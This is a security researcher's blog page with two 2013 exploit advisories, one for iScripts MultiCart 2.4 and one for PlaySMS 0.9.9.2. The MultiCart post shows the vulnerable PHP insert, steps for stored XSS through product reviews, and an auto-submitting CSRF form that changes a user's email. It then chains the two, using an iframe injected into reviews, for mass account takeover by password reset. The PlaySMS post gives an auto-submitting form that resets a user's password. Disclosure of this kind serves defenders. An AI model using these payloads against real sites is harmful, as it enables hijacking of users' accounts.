iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover

Posted by Saadi On Saturday, 14 December 2013 1 comments
# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date           : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.

XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',

'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());

$_POST['txtReview'] is inserted without sanitizing.

Exploitation

Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.

XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.

# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form  name="ex"action="http://localhost/profile.php" method=post >
                        <input type=hidden size=30 maxlength=30 name=userid value="5">
        <input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
        <input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
        <input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
                        <input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
               <input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
       <input type=submit   name=btnSaveChanges class=button value='Save'>
</form>
</html>

#     XSS+CSRF Mass Email Change /Mass Account Takeover

XSS+CSRF can be used to change mass user email ,  after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit

So now whenever user browse different products their useremail will be changed automatically.

#Independent Pakistani Security Researcher
READ MORE

PlaySMS <= 0.9.9.2 CSRF

Posted by Saadi On Monday, 9 December 2013 1 comments
http://www.exploit-db.com/exploits/30177/

# Exploit Title  : PlaySMS <= 0.9.9.2 CSRF
# Date             : 2013/12/9
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link  : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site request forgery

Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.

Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
PoC and Exploit to change user password:

<html>
 <body onload="javascript:document.forms[0].submit()">
<form  name="ex"action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=up_password value="admin">
<input type=hidden size=30 maxlength=30 name=up_password_conf value="admin">
<input type=hidden size=30 maxlength=100 name=up_name value="admin">
<input type=hidden size=30 maxlength=30 name=up_email value="admin@gmail.com">


<td><input type=hidden size=30 maxlength=250 name=up_address value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_city value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_state value=""></td>
<td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td>

<input type=submit class=button value='Save'>
</form>
</html>

#Independent Pakistani Security Researcher
READ MORE